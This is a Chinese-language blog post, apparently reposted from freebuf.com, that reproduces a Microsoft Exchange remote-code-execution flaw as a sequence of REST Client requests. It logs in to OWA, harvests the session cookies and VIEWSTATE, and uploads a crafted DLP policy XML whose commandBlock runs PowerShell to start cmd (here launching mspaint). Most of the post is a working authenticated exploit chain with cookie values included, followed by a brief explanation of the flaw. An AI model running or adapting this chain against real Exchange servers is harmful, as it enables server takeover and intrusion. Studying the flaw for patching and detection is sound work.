微软的exchange 邮件服务器最近被爆出了RCE 漏洞。并有相关人员给出了POC。根据POC 的python 脚本 ,作者拿 vscode 的rest client 分布测试了一下,整个流程。
定义几个变量
@target=target @username=info2002 @password=123456abc
第一步, 登录验证,主要是获取用户的授权cookie,
## 触发RCE 的一个前提,是需要有一个可以登录的账号密码。 ## 登录成功,返回一个 302 跳转,Location 地址为 https://{{target}}/owa ## 自己拷贝返回的cookie,留着下一步使用 POST https://{{target}}/owa/auth.owa Content-Type: application/x-www-form-urlencoded destination=https://{{target}}/owa&flags=&username={{username}}&password={{password}}&forcedownlevel=0&passwordText=&isUtf8=1
第二步,获取viewstate 信息
### 注意添加 cookie 信息,cookie 来自上一步的返回 ### POST 返回一个提交DLP策略的页面,其中包含一个 上传xml 页面的表单。 ### RCE 触发的关键,也是上传一个构建好的xml ### 搜索 __VIEWSTATE 表单,找到后边的value备用 POST https://{{target}}/ecp/DLPPolicy/ManagePolicyFromISV.aspx Cookie: cadata=PNFf9JJYWv0YzkoX5j6QkPv8joj1HGPxf+y5Qv8HuWCTH0aU8z3dCjjan55k8a6PCKn5EdyZJODa2xaVXd26v0ctAWb9M6HR00K0ox5G0bc=; path=/; secure; HttpOnly,cadataTTL=d6qg8liD1i8O8eDQG6dihg==; path=/; secure; HttpOnly,cadataKey=f7uGUtHEafk0woO1GxggVfWuqzLNXJCa51DcVRzzJLYXKByQJubmtzx3WDGrKoLOQyDVt11c4EtBYIQHPXojnLulHRU8fdqoZLCQoPQm6hlxS3XxKBVwZlXMig1UpRCufLLVpvKuVPVdcl54H2mOB0mqlyryTIETcvBP5Amf/3f1abY3De72kva9VSY6m/ETgnjAxA8XpXyipaYBTG87Rq9OZGszXeIxNGAZ6ZA7wfzEQ0BvG+pVFqeYxhXnm3BnYo+6JGuV5X3+kR1hjyLK12AzDR+3fdkOar0xTwkON6fp44PxcqxHMhCDAtCHCD1NEv8wlJzcE8ze614rV+q8zQ==; path=/; secure; HttpOnly,cadataIV=ctnfcTb/AroSCXjUeyq7OYe2GvlksJYDTlmVv6ushP0ai+6/EtfwnaP2imYOhylwIAI1uhh+YFVNghyNaZ51P6w3RCPAJ+RzpUC+AhsxKVs1A9YL8U64hyMe6LkKz/1QqQG+AMot/DYKpqOw3LKnVXsyxJ7XA84G7NjGPQRu4/TQ/e3BaJgSp3QSfnRjQJ9nkbeIKN/iz/vT3nwLw5MIhueTVb3qvXP2YdEJ7JQcEnSuHN/ggwA5AkXzxDClj/DKntFx7f8DduYhQ+SAAOz0QAs4eu954PIVVJiAvb+PMvqJWbCx2/f7prO6u8nyjJz+j3poOV+EmdtFy77DjAB/w==; path=/; secure; HttpOnly,cadataSig=pkEzUP6+8+ugbBpiNxji+eTVagD/JROaWaKO+e3Nsszri6f+xM7eI5oiOGU637ENE8HgW65EKWIyqwjagSIo60PF0mLvSLKGAKCbhlVU7zX0cVlBeYYBidQhnxYV8KflCBJIL9MbDQ9emwH/HdOBS48JJALybzZ/nIiQeIfJsz0ycQS2DUrUCj2qHqDeXDnqrzGNpDtdeNoe0ADc2zm/bKl59N9YgQkYNuz1OArknrhmj/H0FwDUiEB38cg4I+ckZypvVJwMX1V5rG3Csml7BVgMWaDbo6PP9RYALLF28IxhQ62tDgkXn8ltGcdlo7hdWvGvjEfH1I0s5CuT7qwnEw==; path=/; secure; HttpOnly
第三步,触发RCE (不建议执行)
### 同理 cookie 信息,不能丢。 拿着第二步的 viewstate 信息构建恶意的xml,完成RCE. ### 不建议执行这一步 ,触发你能确保你的服务器的环境不受影响。 ### 基本上到第二步就已经可以确认会包含RCE 漏洞了。 POST https://{{target}}/ecp/DLPPolicy/ManagePolicyFromISV.aspx Cookie: cadata=PNFf9JJYWv0YzkoX5j6QkPv8joj1HGPxf+y5Qv8HuWCTH0aU8z3dCjjan55k8a6PCKn5EdyZJODa2xaVXd26v0ctAWb9M6HR00K0ox5G0bc=; path=/; secure; HttpOnly,cadataTTL=d6qg8liD1i8O8eDQG6dihg==; path=/; secure; HttpOnly,cadataKey=f7uGUtHEafk0woO1GxggVfWuqzLNXJCa51DcVRzzJLYXKByQJubmtzx3WDGrKoLOQyDVt11c4EtBYIQHPXojnLulHRU8fdqoZLCQoPQm6hlxS3XxKBVwZlXMig1UpRCufLLVpvKuVPVdcl54H2mOB0mqlyryTIETcvBP5Amf/3f1abY3De72kva9VSY6m/ETgnjAxA8XpXyipaYBTG87Rq9OZGszXeIxNGAZ6ZA7wfzEQ0BvG+pVFqeYxhXnm3BnYo+6JGuV5X3+kR1hjyLK12AzDR+3fdkOar0xTwkON6fp44PxcqxHMhCDAtCHCD1NEv8wlJzcE8ze614rV+q8zQ==; path=/; secure; HttpOnly,cadataIV=ctnfcTb/AroSCXjUeyq7OYe2GvlksJYDTlmVv6ushP0ai+6/EtfwnaP2imYOhylwIAI1uhh+YFVNghyNaZ51P6w3RCPAJ+RzpUC+AhsxKVs1A9YL8U64hyMe6LkKz/1QqQG+AMot/DYKpqOw3LKnVXsyxJ7XA84G7NjGPQRu4/TQ/e3BaJgSp3QSfnRjQJ9nkbeIKN/iz/vT3nwLw5MIhueTVb3qvXP2YdEJ7JQcEnSuHN/ggwA5AkXzxDClj/DKntFx7f8DduYhQ+SAAOz0QAs4eu954PIVVJiAvb+PMvqJWbCx2/f7prO6u8nyjJz+j3poOV+EmdtFy77DjAB/w==; path=/; secure; HttpOnly,cadataSig=pkEzUP6+8+ugbBpiNxji+eTVagD/JROaWaKO+e3Nsszri6f+xM7eI5oiOGU637ENE8HgW65EKWIyqwjagSIo60PF0mLvSLKGAKCbhlVU7zX0cVlBeYYBidQhnxYV8KflCBJIL9MbDQ9emwH/HdOBS48JJALybzZ/nIiQeIfJsz0ycQS2DUrUCj2qHqDeXDnqrzGNpDtdeNoe0ADc2zm/bKl59N9YgQkYNuz1OArknrhmj/H0FwDUiEB38cg4I+ckZypvVJwMX1V5rG3Csml7BVgMWaDbo6PP9RYALLF28IxhQ62tDgkXn8ltGcdlo7hdWvGvjEfH1I0s5CuT7qwnEw==; path=/; secure; HttpOnly Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="ctl00$ResultPanePlaceHolder$senderBtn" ResultPanePlaceHolder_ButtonsPanel_btnNext ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="__VIEWSTATE" /wEPDwUILTg5MDAzMDFkZKEgV4rq2832c5ZF38whYPpaizHg ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="ctl00$ResultPanePlaceHolder$contentContainer$name" anytexthere ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="ctl00$ResultPanePlaceHolder$contentContainer$upldCtrl"; filename="rce.xml" Content-Type: < ./rce.xml ------WebKitFormBoundary7MA4YWxkTrZu0gW--
贴上一个构造好的XML
<?xml version="1.0" encoding="UTF-8"?> <dlpPolicyTemplates> <dlpPolicyTemplate id="F7C29AEC-A52D-4502-9670-141424A83FAB" mode="Audit" state="Enabled" version="15.0.2.0"> <contentVersion>4</contentVersion> <publisherName>si</publisherName> <name> <localizedString lang="en"></localizedString> </name> <description> <localizedString lang="en"></localizedString> </description> <keywords></keywords> <ruleParameters></ruleParameters> <policyCommands> <commandBlock> <![CDATA[ $i=New-object System.Diagnostics.ProcessStartInfo;$i.UseShellExecute=$true;$i.FileName="cmd";$i.Arguments="/c mspaint";$r=New-Object System.Diagnostics.Process;$r.StartInfo=$i;$r.Start() ]]> </commandBlock> </policyCommands> <policyCommandsResources></policyCommandsResources> </dlpPolicyTemplate> </dlpPolicyTemplates>
总结:
总体上来说,使用vsocode 的 rest client 来调试一些漏洞还是比较方便的,编写方便,测试方便。
改漏洞应该是属于一个文件上传漏洞,上传一个xml 文件,后端服务在解析xml文件的时候,触发了内部的
commandBlock 模块,进而执行了内部包含的漏洞,引发RCE。
来源:freebuf.com 2020-09-18 11:53:50 by: qixingyue
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册